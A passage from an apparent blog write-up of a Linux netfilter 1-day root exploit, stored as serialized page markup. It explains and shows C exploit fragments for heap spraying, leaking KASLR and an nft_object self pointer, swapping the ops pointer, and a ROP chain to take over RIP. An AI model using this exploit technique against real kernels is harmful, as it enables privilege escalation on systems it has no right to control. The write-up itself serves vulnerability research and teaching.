slide.\n",{"type":26,"tag":2210,"props":57728,"children":57730},{"alt":53181,"src":57729},"/posts/netfilter-universal-root-1-day/kaslr.png",[],{"type":26,"tag":5512,"props":57732,"children":57734},{"className":31704,"code":57733,"language":31706,"meta":7,"style":7},"[...]\n    // spray 3 udata buffers to consume elems A, B and A again\n    udata_spray(nl, 0xe8, 0, 3, NULL);\n\n    // check if overlap happened (i.e if we have to overlapping udata buffers)\n    char spray_name[16];\n    char *udata[3];\n    for (int i = 0; i \u003C 3; i++)\n    {\n        snprintf(spray_name, sizeof(spray_name), \"spray-%i\", i);\n        udata[i] = getudata(nl, spray_name);\n    }\n    if (udata[0][0] == udata[2][0])\n    {\n        puts(\"[+] got duplicated table\");\n    }\n\n    // Replace one of the udata buffers with nft_object\n    // and read it's counterpart to leak the nft_object struct\n    puts(\"[*] Info leak\");\n    deludata_spray(nl, 0, 1);\n    wait_destroyer();\n    obj_spray(nl, 0, 1, NULL, 0);\n    uint64_t *fake_obj = (uint64_t *)getudata(nl, \"spray-2\");\n[...]\n",[57735],{"type":26,"tag":130,"props":57736,"children":57737},{"__ignoreMap":7},[57738,57745,57753,57788,57795,57803,57828,57855,57906,57913,57946,57972,57979,58044,58051,58072,58079,58086,58094,58102,58123,58152,58164,58208,58264],{"type":26,"tag":137,"props":57739,"children":57740},{"class":5559,"line":5560},[57741],{"type":26,"tag":137,"props":57742,"children":57743},{"style":5601},[57744],{"type":32,"value":12908},{"type":26,"tag":137,"props":57746,"children":57747},{"class":5559,"line":5412},[57748],{"type":26,"tag":137,"props":57749,"children":57750},{"style":5601},[57751],{"type":32,"value":57752},"    // spray 3 udata buffers to consume elems A, B and A again\n",{"type":26,"tag":137,"props":57754,"children":57755},{"class":5559,"line":5417},[57756,57761,57765,57770,57775,57780,57784],{"type":26,"tag":137,"props":57757,"children":57758},{"style":5601},[57759],{"type":32,"value":57760},"    udata_spray(",{"type":26,"tag":137,"props":57762,"children":57763},{"style":6009},[57764],{"type":32,"value":56893},{"type":26,"tag":137,"props":57766,"children":57767},{"style":5601},[57768],{"type":32,"value":57769},", 0",{"type":26,"tag":137,"props":57771,"children":57772},{"style":6009},[57773],{"type":32,"value":57774},"xe8",{"type":26,"tag":137,"props":57776,"children":57777},{"style":5601},[57778],{"type":32,"value":57779},", 0, 3, ",{"type":26,"tag":137,"props":57781,"children":57782},{"style":6009},[57783],{"type":32,"value":57099},{"type":26,"tag":137,"props":57785,"children":57786},{"style":5601},[57787],{"type":32,"value":6430},{"type":26,"tag":137,"props":57789,"children":57790},{"class":5559,"line":5642},[57791],{"type":26,"tag":137,"props":57792,"children":57793},{"emptyLinePlaceholder":18},[57794],{"type":32,"value":6276},{"type":26,"tag":137,"props":57796,"children":57797},{"class":5559,"line":5745},[57798],{"type":26,"tag":137,"props":57799,"children":57800},{"style":5564},[57801],{"type":32,"value":57802},"    // check if overlap happened (i.e if we have to overlapping udata buffers)\n",{"type":26,"tag":137,"props":57804,"children":57805},{"class":5559,"line":5850},[57806,57811,57816,57820,57824],{"type":26,"tag":137,"props":57807,"children":57808},{"style":5573},[57809],{"type":32,"value":57810},"    char",{"type":26,"tag":137,"props":57812,"children":57813},{"style":5584},[57814],{"type":32,"value":57815}," spray_name",{"type":26,"tag":137,"props":57817,"children":57818},{"style":5601},[57819],{"type":32,"value":3016},{"type":26,"tag":137,"props":57821,"children":57822},{"style":5626},[57823],{"type":32,"value":43444},{"type":26,"tag":137,"props":57825,"children":57826},{"style":5601},[57827],{"type":32,"value":34169},{"type":26,"tag":137,"props":57829,"children":57830},{"class":5559,"line":5878},[57831,57835,57839,57843,57847,57851],{"type":26,"tag":137,"props":57832,"children":57833},{"style":5573},[57834],{"type":32,"value":57810},{"type":26,"tag":137,"props":57836,"children":57837},{"style":5590},[57838],{"type":32,"value":12406},{"type":26,"tag":137,"props":57840,"children":57841},{"style":5584},[57842],{"type":32,"value":57701},{"type":26,"tag":137,"props":57844,"children":57845},{"style":5601},[57846],{"type":32,"value":3016},{"type":26,"tag":137,"props":57848,"children":57849},{"style":5626},[57850],{"type":32,"value":344},{"type":26,"tag":137,"props":57852,"children":57853},{"style":5601},[57854],{"type":32,"value":34169},{"type":26,"tag":137,"props":57856,"children":57857},{"class":5559,"line":5891},[57858,57862,57866,57870,57874,57878,57882,57886,57890,57894,57898,57902],{"type":26,"tag":137,"props":57859,"children":57860},{"style":5610},[57861],{"type":32,"value":5613},{"type":26,"tag":137,"props":57863,"children":57864},{"style":5601},[57865],{"type":32,"value":4625},{"type":26,"tag":137,"props":57867,"children":57868},{"style":5573},[57869],{"type":32,"value":21640},{"type":26,"tag":137,"props":57871,"children":57872},{"style":5601},[57873],{"type":32,"value":57147},{"type":26,"tag":137,"props":57875,"children":57876},{"style":5590},[57877],{"type":32,"value":289},{"type":26,"tag":137,"props":57879,"children":57880},{"style":5626},[57881],{"type":32,"value":5629},{"type":26,"tag":137,"props":57883,"children":57884},{"style":5601},[57885],{"type":32,"value":53836},{"type":26,"tag":137,"props":57887,"children":57888},{"style":5590},[57889],{"type":32,"value":8391},{"type":26,"tag":137,"props":57891,"children":57892},{"style":5626},[57893],{"type":32,"value":21692},{"type":26,"tag":137,"props":57895,"children":57896},{"style":5601},[57897],{"type":32,"value":53867},{"type":26,"tag":137,"props":57899,"children":57900},{"style":5590},[57901],{"type":32,"value":53872},{"type":26,"tag":137,"props":57903,"children":57904},{"style":5601},[57905],{"type":32,"value":5742},{"type":26,"tag":137,"props":57907,"children":57908},{"class":5559,"line":5909},[57909],{"type":26,"tag":137,"props":57910,"children":57911},{"style":5601},[57912],{"type":32,"value":31781},{"type":26,"tag":137,"props":57914,"children":57915},{"class":5559,"line":5930},[57916,57921,57926,57931,57936,57941],{"type":26,"tag":137,"props":57917,"children":57918},{"style":5682},[57919],{"type":32,"value":57920},"        snprintf",{"type":26,"tag":137,"props":57922,"children":57923},{"style":5601},[57924],{"type":32,"value":57925},"(spray_name, ",{"type":26,"tag":137,"props":57927,"children":57928},{"style":5573},[57929],{"type":32,"value":57930},"sizeof",{"type":26,"tag":137,"props":57932,"children":57933},{"style":5601},[57934],{"type":32,"value":57935},"(spray_name), ",{"type":26,"tag":137,"props":57937,"children":57938},{"style":6837},[57939],{"type":32,"value":57940},"\"spray-%i\"",{"type":26,"tag":137,"props":57942,"children":57943},{"style":5601},[57944],{"type":32,"value":57945},", i);\n",{"type":26,"tag":137,"props":57947,"children":57948},{"class":5559,"line":5939},[57949,57954,57958,57962,57967],{"type":26,"tag":137,"props":57950,"children":57951},{"style":5584},[57952],{"type":32,"value":57953},"        udata",{"type":26,"tag":137,"props":57955,"children":57956},{"style":5601},[57957],{"type":32,"value":57199},{"type":26,"tag":137,"props":57959,"children":57960},{"style":5590},[57961],{"type":32,"value":289},{"type":26,"tag":137,"props":57963,"children":57964},{"style":5682},[57965],{"type":32,"value":57966}," getudata",{"type":26,"tag":137,"props":57968,"children":57969},{"style":5601},[57970],{"type":32,"value":57971},"(nl, spray_name);\n",{"type":26,"tag":137,"props":57973,"children":57974},{"class":5559,"line":6191},[57975],{"type":26,"tag":137,"props":57976,"children":57977},{"style":5601},[57978],{"type":32,"value":5945},{"type":26,"tag":137,"props":57980,"children":57981},{"class":5559,"line":6208},[57982,57986,57990,57994,57998,58002,58006,58010,58014,58018,58023,58027,58031,58035,58039],{"type":26,"tag":137,"props":57983,"children":57984},{"style":5610},[57985],{"type":32,"value":14870},{"type":26,"tag":137,"props":57987,"children":57988},{"style":5601},[57989],{"type":32,"value":4625},{"type":26,"tag":137,"props":57991,"children":57992},{"style":5584},[57993],{"type":32,"value":57701},{"type":26,"tag":137,"props":57995,"children":57996},{"style":5601},[57997],{"type":32,"value":3016},{"type":26,"tag":137,"props":57999,"children":58000},{"style":5626},[58001],{"type":32,"value":1817},{"type":26,"tag":137,"props":58003,"children":58004},{"style":5601},[58005],{"type":32,"value":51560},{"type":26,"tag":137,"props":58007,"children":58008},{"style":5626},[58009],{"type":32,"value":1817},{"type":26,"tag":137,"props":58011,"children":58012},{"style":5601},[58013],{"type":32,"value":11247},{"type":26,"tag":137,"props":58015,"children":58016},{"style":5590},[58017],{"type":32,"value":11161},{"type":26,"tag":137,"props":58019,"children":58020},{"style":5584},[58021],{"type":32,"value":58022}," udata",{"type":26,"tag":137,"props":58024,"children":58025},{"style":5601},[58026],{"type":32,"value":3016},{"type":26,"tag":137,"props":58028,"children":58029},{"style":5626},[58030],{"type":32,"value":277},{"type":26,"tag":137,"props":58032,"children":58033},{"style":5601},[58034],{"type":32,"value":51560},{"type":26,"tag":137,"props":58036,"children":58037},{"style":5626},[58038],{"type":32,"value":1817},{"type":26,"tag":137,"props":58040,"children":58041},{"style":5601},[58042],{"type":32,"value":58043},"])\n",{"type":26,"tag":137,"props":58045,"children":58046},{"class":5559,"line":6225},[58047],{"type":26,"tag":137,"props":58048,"children":58049},{"style":5601},[58050],{"type":32,"value":31781},{"type":26,"tag":137,"props":58052,"children":58053},{"class":5559,"line":6238},[58054,58059,58063,58068],{"type":26,"tag":137,"props":58055,"children":58056},{"style":5682},[58057],{"type":32,"value":58058},"        puts",{"type":26,"tag":137,"props":58060,"children":58061},{"style":5601},[58062],{"type":32,"value":165},{"type":26,"tag":137,"props":58064,"children":58065},{"style":6837},[58066],{"type":32,"value":58067},"\"[+] got duplicated table\"",{"type":26,"tag":137,"props":58069,"children":58070},{"style":5601},[58071],{"type":32,"value":6430},{"type":26,"tag":137,"props":58073,"children":58074},{"class":5559,"line":6247},[58075],{"type":26,"tag":137,"props":58076,"children":58077},{"style":5601},[58078],{"type":32,"value":5945},{"type":26,"tag":137,"props":58080,"children":58081},{"class":5559,"line":6270},[58082],{"type":26,"tag":137,"props":58083,"children":58084},{"emptyLinePlaceholder":18},[58085],{"type":32,"value":6276},{"type":26,"tag":137,"props":58087,"children":58088},{"class":5559,"line":6279},[58089],{"type":26,"tag":137,"props":58090,"children":58091},{"style":5564},[58092],{"type":32,"value":58093},"    // Replace one of the udata buffers with nft_object\n",{"type":26,"tag":137,"props":58095,"children":58096},{"class":5559,"line":6288},[58097],{"type":26,"tag":137,"props":58098,"children":58099},{"style":5564},[58100],{"type":32,"value":58101},"    // and read it's counterpart to leak the nft_object struct\n",{"type":26,"tag":137,"props":58103,"children":58104},{"class":5559,"line":6355},[58105,58110,58114,58119],{"type":26,"tag":137,"props":58106,"children":58107},{"style":5682},[58108],{"type":32,"value":58109},"    puts",{"type":26,"tag":137,"props":58111,"children":58112},{"style":5601},[58113],{"type":32,"value":165},{"type":26,"tag":137,"props":58115,"children":58116},{"style":6837},[58117],{"type":32,"value":58118},"\"[*] Info leak\"",{"type":26,"tag":137,"props":58120,"children":58121},{"style":5601},[58122],{"type":32,"value":6430},{"type":26,"tag":137,"props":58124,"children":58125},{"class":5559,"line":6363},[58126,58131,58136,58140,58144,58148],{"type":26,"tag":137,"props":58127,"children":58128},{"style":5682},[58129],{"type":32,"value":58130},"    deludata_spray",{"type":26,"tag":137,"props":58132,"children":58133},{"style":5601},[58134],{"type":32,"value":58135},"(nl, ",{"type":26,"tag":137,"props":58137,"children":58138},{"style":5626},[58139],{"type":32,"value":1817},{"type":26,"tag":137,"props":58141,"children":58142},{"style":5601},[58143],{"type":32,"value":1108},{"type":26,"tag":137,"props":58145,"children":58146},{"style":5626},[58147],{"type":32,"value":878},{"type":26,"tag":137,"props":58149,"children":58150},{"style":5601},[58151],{"type":32,"value":6430},{"type":26,"tag":137,"props":58153,"children":58154},{"class":5559,"line":6393},[58155,58160],{"type":26,"tag":137,"props":58156,"children":58157},{"style":5682},[58158],{"type":32,"value":58159},"    wait_destroyer",{"type":26,"tag":137,"props":58161,"children":58162},{"style":5601},[58163],{"type":32,"value":6267},{"type":26,"tag":137,"props":58165,"children":58166},{"class":5559,"line":6401},[58167,58172,58176,58180,58184,58188,58192,58196,58200,58204],{"type":26,"tag":137,"props":58168,"children":58169},{"style":5682},[58170],{"type":32,"value":58171},"    obj_spray",{"type":26,"tag":137,"props":58173,"children":58174},{"style":5601},[58175],{"type":32,"value":58135},{"type":26,"tag":137,"props":58177,"children":58178},{"style":5626},[58179],{"type":32,"value":1817},{"type":26,"tag":137,"props":58181,"children":58182},{"style":5601},[58183],{"type":32,"value":1108},{"type":26,"tag":137,"props":58185,"children":58186},{"style":5626},[58187],{"type":32,"value":878},{"type":26,"tag":137,"props":58189,"children":58190},{"style":5601},[58191],{"type":32,"value":1108},{"type":26,"tag":137,"props":58193,"children":58194},{"style":5573},[58195],{"type":32,"value":57099},{"type":26,"tag":137,"props":58197,"children":58198},{"style":5601},[58199],{"type":32,"value":1108},{"type":26,"tag":137,"props":58201,"children":58202},{"style":5626},[58203],{"type":32,"value":1817},{"type":26,"tag":137,"props":58205,"children":58206},{"style":5601},[58207],{"type":32,"value":6430},{"type":26,"tag":137,"props":58209,"children":58210},{"class":5559,"line":6433},[58211,58216,58220,58225,58229,58233,58238,58242,58246,58251,58255,58260],{"type":26,"tag":137,"props":58212,"children":58213},{"style":5573},[58214],{"type":32,"value":58215},"    uint64_t",{"type":26,"tag":137,"props":58217,"children":58218},{"style":5590},[58219],{"type":32,"value":12406},{"type":26,"tag":137,"props":58221,"children":58222},{"style":5601},[58223],{"type":32,"value":58224},"fake_obj ",{"type":26,"tag":137,"props":58226,"children":58227},{"style":5590},[58228],{"type":32,"value":289},{"type":26,"tag":137,"props":58230,"children":58231},{"style":5601},[58232],{"type":32,"value":4625},{"type":26,"tag":137,"props":58234,"children":58235},{"style":5573},[58236],{"type":32,"value":58237},"uint64_t",{"type":26,"tag":137,"props":58239,"children":58240},{"style":5590},[58241],{"type":32,"value":12406},{"type":26,"tag":137,"props":58243,"children":58244},{"style":5601},[58245],{"type":32,"value":200},{"type":26,"tag":137,"props":58247,"children":58248},{"style":5682},[58249],{"type":32,"value":58250},"getudata",{"type":26,"tag":137,"props":58252,"children":58253},{"style":5601},[58254],{"type":32,"value":58135},{"type":26,"tag":137,"props":58256,"children":58257},{"style":6837},[58258],{"type":32,"value":58259},"\"spray-2\"",{"type":26,"tag":137,"props":58261,"children":58262},{"style":5601},[58263],{"type":32,"value":6430},{"type":26,"tag":137,"props":58265,"children":58266},{"class":5559,"line":6441},[58267],{"type":26,"tag":137,"props":58268,"children":58269},{"style":5601},[58270],{"type":32,"value":12908},{"type":26,"tag":118,"props":58272,"children":58274},{"id":58273},"leaking-self-pointer-of-nft_object",[58275,58277],{"type":32,"value":58276},"Leaking self pointer of ",{"type":26,"tag":130,"props":58278,"children":58280},{"className":58279},[],[58281],{"type":32,"value":57716},{"type":26,"tag":35,"props":58283,"children":58284},{},[58285,58287,58292,58294,58299,58301,58306,58308,58314],{"type":32,"value":58286},"As I'll discuss in more depth in the ROP section, the exploit relies on a known address of controllable memory to work. I decided to use the ",{"type":26,"tag":130,"props":58288,"children":58290},{"className":58289},[],[58291],{"type":32,"value":57716},{"type":32,"value":58293}," to get its own address. This is possible because the ",{"type":26,"tag":130,"props":58295,"children":58297},{"className":58296},[],[58298],{"type":32,"value":57716},{"type":32,"value":58300}," has a ",{"type":26,"tag":130,"props":58302,"children":58304},{"className":58303},[],[58305],{"type":32,"value":57701},{"type":32,"value":58307}," pointer (similar to ",{"type":26,"tag":130,"props":58309,"children":58311},{"className":58310},[],[58312],{"type":32,"value":58313},"table->udata",{"type":32,"value":58315}," that I used for leaking KASLR), that I can use to read/write data.",{"type":26,"tag":35,"props":58317,"children":58318},{},[58319,58320,58325,58327,58333,58335,58340,58342,58347,58349,58355,58357,58362,58364,58369,58371,58376,58378],{"type":32,"value":19206},{"type":26,"tag":130,"props":58321,"children":58323},{"className":58322},[],[58324],{"type":32,"value":57716},{"type":32,"value":58326}," struct also contains a ",{"type":26,"tag":130,"props":58328,"children":58330},{"className":58329},[],[58331],{"type":32,"value":58332},"list_head",{"type":32,"value":58334}," inserted in a circular list containing all ",{"type":26,"tag":130,"props":58336,"children":58338},{"className":58337},[],[58339],{"type":32,"value":57716},{"type":32,"value":58341},"'s that belong to a given ",{"type":26,"tag":130,"props":58343,"children":58345},{"className":58344},[],[58346],{"type":32,"value":3584},{"type":32,"value":58348},". Considering that our object is currently alone in its table, the ",{"type":26,"tag":130,"props":58350,"children":58352},{"className":58351},[],[58353],{"type":32,"value":58354},"table->list.next",{"type":32,"value":58356}," pointer in the ",{"type":26,"tag":130,"props":58358,"children":58360},{"className":58359},[],[58361],{"type":32,"value":57716},{"type":32,"value":58363}," will point back to the ",{"type":26,"tag":130,"props":58365,"children":58367},{"className":58366},[],[58368],{"type":32,"value":58332},{"type":32,"value":58370}," contained in the ",{"type":26,"tag":130,"props":58372,"children":58374},{"className":58373},[],[58375],{"type":32,"value":3584},{"type":32,"value":58377}," and vice-versa.\n",{"type":26,"tag":2210,"props":58379,"children":58381},{"alt":53181,"src":58380},"/posts/netfilter-universal-root-1-day/nft-object.png",[],{"type":26,"tag":35,"props":58383,"children":58384},{},[58385,58387,58392,58394,58399,58401,58407,58409,58414,58415,58420,58422,58427,58429,58434],{"type":32,"value":58386},"In short, that means that if we swap the ",{"type":26,"tag":130,"props":58388,"children":58390},{"className":58389},[],[58391],{"type":32,"value":57701},{"type":32,"value":58393}," pointer of the ",{"type":26,"tag":130,"props":58395,"children":58397},{"className":58396},[],[58398],{"type":32,"value":57716},{"type":32,"value":58400}," with its own ",{"type":26,"tag":130,"props":58402,"children":58404},{"className":58403},[],[58405],{"type":32,"value":58406},"list.next",{"type":32,"value":58408}," pointer we should be able to read a pointer back to the ",{"type":26,"tag":130,"props":58410,"children":58412},{"className":58411},[],[58413],{"type":32,"value":57716},{"type":32,"value":54942},{"type":26,"tag":130,"props":58416,"children":58418},{"className":58417},[],[58419],{"type":32,"value":58332},{"type":32,"value":58421}," which is also the start of the ",{"type":26,"tag":130,"props":58423,"children":58425},{"className":58424},[],[58426],{"type":32,"value":57716},{"type":32,"value":58428}," itself.\n",{"type":26,"tag":84,"props":58430,"children":58431},{},[58432],{"type":32,"value":58433},"NOTE:",{"type":32,"value":58435}," This is a novel small trick.",{"type":26,"tag":5512,"props":58437,"children":58439},{"className":31704,"code":58438,"language":31706,"meta":7,"style":7},"[...]\n    // Leak nft_object ptr using table linked list\n    fake_obj[8] = 8;           // ulen = 8\n    fake_obj[9] = fake_obj[0]; // udata = list->next\n    deludata_spray(nl, 2, 1);\n    wait_destroyer();\n    udata_spray(nl, 0xe8, 3, 1, fake_obj);\n\n    get_obj(nl, \"spray-0\", true);\n    printf(\"[*] nft_object ptr: 0x%lx\\n\", obj_ptr);\n[...]\n",[58440],{"type":26,"tag":130,"props":58441,"children":58442},{"__ignoreMap":7},[58443,58450,58458,58471,58519,58546,58557,58595,58602,58631,58661],{"type":26,"tag":137,"props":58444,"children":58445},{"class":5559,"line":5560},[58446],{"type":26,"tag":137,"props":58447,"children":58448},{"style":5601},[58449],{"type":32,"value":12908},{"type":26,"tag":137,"props":58451,"children":58452},{"class":5559,"line":5412},[58453],{"type":26,"tag":137,"props":58454,"children":58455},{"style":5601},[58456],{"type":32,"value":58457},"    // Leak nft_object ptr using table linked list\n",{"type":26,"tag":137,"props":58459,"children":58460},{"class":5559,"line":5417},[58461,58466],{"type":26,"tag":137,"props":58462,"children":58463},{"style":5601},[58464],{"type":32,"value":58465},"    fake_obj[8] = 8;",{"type":26,"tag":137,"props":58467,"children":58468},{"style":5564},[58469],{"type":32,"value":58470},"           // ulen = 8\n",{"type":26,"tag":137,"props":58472,"children":58473},{"class":5559,"line":5642},[58474,58479,58483,58488,58492,58496,58501,58505,58509,58514],{"type":26,"tag":137,"props":58475,"children":58476},{"style":5584},[58477],{"type":32,"value":58478},"    fake_obj",{"type":26,"tag":137,"props":58480,"children":58481},{"style":5601},[58482],{"type":32,"value":3016},{"type":26,"tag":137,"props":58484,"children":58485},{"style":5626},[58486],{"type":32,"value":58487},"9",{"type":26,"tag":137,"props":58489,"children":58490},{"style":5601},[58491],{"type":32,"value":11247},{"type":26,"tag":137,"props":58493,"children":58494},{"style":5590},[58495],{"type":32,"value":289},{"type":26,"tag":137,"props":58497,"children":58498},{"style":5584},[58499],{"type":32,"value":58500}," fake_obj",{"type":26,"tag":137,"props":58502,"children":58503},{"style":5601},[58504],{"type":32,"value":3016},{"type":26,"tag":137,"props":58506,"children":58507},{"style":5626},[58508],{"type":32,"value":1817},{"type":26,"tag":137,"props":58510,"children":58511},{"style":5601},[58512],{"type":32,"value":58513},"];",{"type":26,"tag":137,"props":58515,"children":58516},{"style":5564},[58517],{"type":32,"value":58518}," // udata = list->next\n",{"type":26,"tag":137,"props":58520,"children":58521},{"class":5559,"line":5745},[58522,58526,58530,58534,58538,58542],{"type":26,"tag":137,"props":58523,"children":58524},{"style":5682},[58525],{"type":32,"value":58130},{"type":26,"tag":137,"props":58527,"children":58528},{"style":5601},[58529],{"type":32,"value":58135},{"type":26,"tag":137,"props":58531,"children":58532},{"style":5626},[58533],{"type":32,"value":277},{"type":26,"tag":137,"props":58535,"children":58536},{"style":5601},[58537],{"type":32,"value":1108},{"type":26,"tag":137,"props":58539,"children":58540},{"style":5626},[58541],{"type":32,"value":878},{"type":26,"tag":137,"props":58543,"children":58544},{"style":5601},[58545],{"type":32,"value":6430},{"type":26,"tag":137,"props":58547,"children":58548},{"class":5559,"line":5850},[58549,58553],{"type":26,"tag":137,"props":58550,"children":58551},{"style":5682},[58552],{"type":32,"value":58159},{"type":26,"tag":137,"props":58554,"children":58555},{"style":5601},[58556],{"type":32,"value":6267},{"type":26,"tag":137,"props":58558,"children":58559},{"class":5559,"line":5878},[58560,58565,58569,58574,58578,58582,58586,58590],{"type":26,"tag":137,"props":58561,"children":58562},{"style":5682},[58563],{"type":32,"value":58564},"    udata_spray",{"type":26,"tag":137,"props":58566,"children":58567},{"style":5601},[58568],{"type":32,"value":58135},{"type":26,"tag":137,"props":58570,"children":58571},{"style":5626},[58572],{"type":32,"value":58573},"0xe8",{"type":26,"tag":137,"props":58575,"children":58576},{"style":5601},[58577],{"type":32,"value":1108},{"type":26,"tag":137,"props":58579,"children":58580},{"style":5626},[58581],{"type":32,"value":344},{"type":26,"tag":137,"props":58583,"children":58584},{"style":5601},[58585],{"type":32,"value":1108},{"type":26,"tag":137,"props":58587,"children":58588},{"style":5626},[58589],{"type":32,"value":878},{"type":26,"tag":137,"props":58591,"children":58592},{"style":5601},[58593],{"type":32,"value":58594},", fake_obj);\n",{"type":26,"tag":137,"props":58596,"children":58597},{"class":5559,"line":5891},[58598],{"type":26,"tag":137,"props":58599,"children":58600},{"emptyLinePlaceholder":18},[58601],{"type":32,"value":6276},{"type":26,"tag":137,"props":58603,"children":58604},{"class":5559,"line":5909},[58605,58610,58614,58619,58623,58627],{"type":26,"tag":137,"props":58606,"children":58607},{"style":5682},[58608],{"type":32,"value":58609},"    get_obj",{"type":26,"tag":137,"props":58611,"children":58612},{"style":5601},[58613],{"type":32,"value":58135},{"type":26,"tag":137,"props":58615,"children":58616},{"style":6837},[58617],{"type":32,"value":58618},"\"spray-0\"",{"type":26,"tag":137,"props":58620,"children":58621},{"style":5601},[58622],{"type":32,"value":1108},{"type":26,"tag":137,"props":58624,"children":58625},{"style":5573},[58626],{"type":32,"value":146},{"type":26,"tag":137,"props":58628,"children":58629},{"style":5601},[58630],{"type":32,"value":6430},{"type":26,"tag":137,"props":58632,"children":58633},{"class":5559,"line":5930},[58634,58639,58643,58648,58652,58656],{"type":26,"tag":137,"props":58635,"children":58636},{"style":5682},[58637],{"type":32,"value":58638},"    printf",{"type":26,"tag":137,"props":58640,"children":58641},{"style":5601},[58642],{"type":32,"value":165},{"type":26,"tag":137,"props":58644,"children":58645},{"style":6837},[58646],{"type":32,"value":58647},"\"[*] nft_object ptr: 0x%lx",{"type":26,"tag":137,"props":58649,"children":58650},{"style":50975},[58651],{"type":32,"value":50978},{"type":26,"tag":137,"props":58653,"children":58654},{"style":6837},[58655],{"type":32,"value":22653},{"type":26,"tag":137,"props":58657,"children":58658},{"style":5601},[58659],{"type":32,"value":58660},", obj_ptr);\n",{"type":26,"tag":137,"props":58662,"children":58663},{"class":5559,"line":5939},[58664],{"type":26,"tag":137,"props":58665,"children":58666},{"style":5601},[58667],{"type":32,"value":12908},{"type":26,"tag":118,"props":58669,"children":58671},{"id":58670},"hijacking-control-flow",[58672],{"type":32,"value":58673},"Hijacking control-flow",{"type":26,"tag":35,"props":58675,"children":58676},{},[58677,58679,58684,58686,58691,58693,58698,58700,58705,58707,58712,58714],{"type":32,"value":58678},"To hijack control-flow, we can use ",{"type":26,"tag":130,"props":58680,"children":58682},{"className":58681},[],[58683],{"type":32,"value":57716},{"type":32,"value":58685}," once again. The ",{"type":26,"tag":130,"props":58687,"children":58689},{"className":58688},[],[58690],{"type":32,"value":57716},{"type":32,"value":58692}," struct has an ",{"type":26,"tag":130,"props":58694,"children":58696},{"className":58695},[],[58697],{"type":32,"value":55273},{"type":32,"value":58699}," pointer to a function pointer table. We can swap the ",{"type":26,"tag":130,"props":58701,"children":58703},{"className":58702},[],[58704],{"type":32,"value":55273},{"type":32,"value":58706}," pointer with the ",{"type":26,"tag":130,"props":58708,"children":58710},{"className":58709},[],[58711],{"type":32,"value":57701},{"type":32,"value":58713}," pointer, taking control of the pointer table.\n",{"type":26,"tag":2210,"props":58715,"children":58717},{"alt":53181,"src":58716},"/posts/netfilter-universal-root-1-day/control-flow.png",[],{"type":26,"tag":5512,"props":58719,"children":58721},{"className":31704,"code":58720,"language":31706,"meta":7,"style":7},"[...]\n    // Fake ops\n    uint64_t *rop = calloc(29, sizeof(uint64_t));\n    rop[0] = kaslr_slide + 0xffffffff81988647; // push rsi; jmp qword ptr [rsi + 0x39];\n    rop[2] = kaslr_slide + NFT_CT_EXPECT_OBJ_TYPE;\n[...]\n    // Send ROP in object udata\n    del_obj(nl, \"spray-0\");\n    wait_destroyer();\n    obj_spray(nl, 1, 1, rop, 0xb8);\n    fake_obj = (uint64_t *)getudata(nl, \"spray-3\");\n    DumpHex(fake_obj, 0xe8);\n    uint64_t rop_addr = fake_obj[9]; // udata ptr\n    printf(\"[*] ROP addr: 0x%lx\\n\", rop_addr);\n\n    // Point to fake ops\n    fake_obj[16] = rop_addr - 0x20; // Point ops to fake ptr table\n[...]\n    // Write ROP\n    puts(\"[*] Write ROP\");\n    deludata_spray(nl, 3, 1);\n    wait_destroyer();\n    udata_spray(nl, 0xe8, 4, 1, fake_obj);\n\n    // Takeover RIP\n    puts(\"[*] Takeover RIP\");\n    dump_obj(nl, \"spray-1\");\n[...]\n",[58722],{"type":26,"tag":130,"props":58723,"children":58724},{"__ignoreMap":7},[58725,58732,58740,58764,58811,58847,58854,58862,58894,58902,58910,58931,58939,58947,59010,59017,59025,59033,59040,59048,59082,59090,59097,59105,59112,59120,59153,59174],{"type":26,"tag":137,"props":58726,"children":58727},{"class":5559,"line":5560},[58728],{"type":26,"tag":137,"props":58729,"children":58730},{"style":5601},[58731],{"type":32,"value":12908},{"type":26,"tag":137,"props":58733,"children":58734},{"class":5559,"line":5412},[58735],{"type":26,"tag":137,"props":58736,"children":58737},{"style":5601},[58738],{"type":32,"value":58739},"    // Fake ops\n",{"type":26,"tag":137,"props":58741,"children":58742},{"class":5559,"line":5417},[58743,58748,58752,58756,58760],{"type":26,"tag":137,"props":58744,"children":58745},{"style":5601},[58746],{"type":32,"value":58747},"    uint64_t *rop = calloc(29, ",{"type":26,"tag":137,"props":58749,"children":58750},{"style":6009},[58751],{"type":32,"value":57930},{"type":26,"tag":137,"props":58753,"children":58754},{"style":5601},[58755],{"type":32,"value":165},{"type":26,"tag":137,"props":58757,"children":58758},{"style":5573},[58759],{"type":32,"value":58237},{"type":26,"tag":137,"props":58761,"children":58762},{"style":5601},[58763],{"type":32,"value":9807},{"type":26,"tag":137,"props":58765,"children":58766},{"class":5559,"line":5642},[58767,58772,58776,58780,58784,58788,58793,58797,58802,58806],{"type":26,"tag":137,"props":58768,"children":58769},{"style":5584},[58770],{"type":32,"value":58771},"    rop",{"type":26,"tag":137,"props":58773,"children":58774},{"style":5601},[58775],{"type":32,"value":3016},{"type":26,"tag":137,"props":58777,"children":58778},{"style":5626},[58779],{"type":32,"value":1817},{"type":26,"tag":137,"props":58781,"children":58782},{"style":5601},[58783],{"type":32,"value":11247},{"type":26,"tag":137,"props":58785,"children":58786},{"style":5590},[58787],{"type":32,"value":289},{"type":26,"tag":137,"props":58789,"children":58790},{"style":5601},[58791],{"type":32,"value":58792}," kaslr_slide ",{"type":26,"tag":137,"props":58794,"children":58795},{"style":5590},[58796],{"type":32,"value":356},{"type":26,"tag":137,"props":58798,"children":58799},{"style":5626},[58800],{"type":32,"value":58801}," 0xffffffff81988647",{"type":26,"tag":137,"props":58803,"children":58804},{"style":5601},[58805],{"type":32,"value":51676},{"type":26,"tag":137,"props":58807,"children":58808},{"style":5564},[58809],{"type":32,"value":58810}," // push rsi; jmp qword ptr [rsi + 